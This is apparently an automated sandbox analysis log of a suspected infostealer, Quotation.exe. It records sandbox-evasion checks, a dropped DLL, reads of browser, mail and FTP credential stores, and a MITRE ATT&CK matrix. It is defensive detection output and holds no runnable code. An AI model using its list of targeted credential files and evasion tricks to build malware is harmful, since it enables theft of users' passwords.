            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 5B9ABB4
            Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 271ABB4
            Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 5B497DF second address: 5B497DF instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7950CA1820h 0x00000006 test esi, 599FB90Eh 0x0000000c inc ebp 0x0000000d test al, C1h 0x0000000f inc ebx 0x00000010 test dl, bl 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 26C97DF second address: 26C97DF instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F79511522E0h 0x00000006 test esi, 599FB90Eh 0x0000000c inc ebp 0x0000000d test al, C1h 0x0000000f inc ebx 0x00000010 test dl, bl 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: 35060000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: 34F70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1200000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199891Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199781Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199672Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199563Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199453Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199344Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199219Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199109Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198891Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198781Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198672Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198562Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198453Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198344Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198219Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198109Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1197890Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeWindow / User API: threadDelayed 7747Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeWindow / User API: threadDelayed 2068Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsbDE39.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Quotation.exeEvaded block: after key decisiongraph_0-2964
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -30437127721620741s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 2860Thread sleep count: 7747 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -99891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 2860Thread sleep count: 2068 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -99782s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -99657s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -99532s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -99422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -99313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -99188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -99063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -98938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -98813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -98704s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -98579s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -98454s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -98329s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -98204s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -98079s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -97954s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -97829s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -97704s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -97579s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -97454s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -97329s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -97204s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -97079s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -96954s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -96829s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -96704s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -96579s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -96454s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1200000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1199891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1199781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1199672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1199563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1199453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1199344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1199219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1199109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1199000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1198891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1198781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1198672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1198562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1198453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1198344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1198219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1198109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1198000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exe TID: 3028Thread sleep time: -1197890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004066F7
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004065AD FindFirstFileW,FindClose,0_2_004065AD
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99891Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99782Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99657Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99532Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99422Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99313Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99188Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 99063Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98938Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98813Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98704Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98579Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98454Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98329Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98204Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 98079Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97954Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97829Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97704Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97579Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97454Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97329Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97204Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 97079Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96954Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96829Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96704Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96579Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 96454Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1200000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199891Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199781Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199672Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199563Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199453Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199344Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199219Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199109Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1199000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198891Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198781Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198672Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198562Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198453Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198344Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198219Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198109Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1198000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeThread delayed: delay time: 1197890Jump to behavior
            Source: Quotation.exe, 00000009.00000002.2499184774.0000000004C87000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2499184774.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2499184774.0000000004C38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Quotation.exeAPI call chain: ExitProcess graph end nodegraph_0-2850
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00403148 LdrInitializeThunk,GetTickCount,GetTickCount,LdrInitializeThunk,MulDiv,wsprintfW,LdrInitializeThunk,0_2_00403148
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_73C62351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73C62351
            Source: C:\Users\user\Desktop\Quotation.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Users\user\Desktop\Quotation.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,0_2_004036DA
            Source: C:\Users\user\Desktop\Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000009.00000002.2518927845.00000000350DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2518927845.00000000350B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 1516, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000009.00000002.2518927845.00000000350B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 1516, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000009.00000002.2518927845.00000000350DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2518927845.00000000350B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 1516, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            3
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Native API
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Obfuscated Files or Information
            21
            Input Capture
            225
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection
            1
            DLL Side-Loading
            1
            Credentials in Registry
            311
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Masquerading
            NTDS141
            Virtualization/Sandbox Evasion
            Distributed Component Object Model21
            Input Capture
            2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
            Virtualization/Sandbox Evasion
            LSA Secrets1
            Application Window Discovery
            SSH1
            Clipboard Data
            23
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation
            Cached Domain Credentials1
            System Network Configuration Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
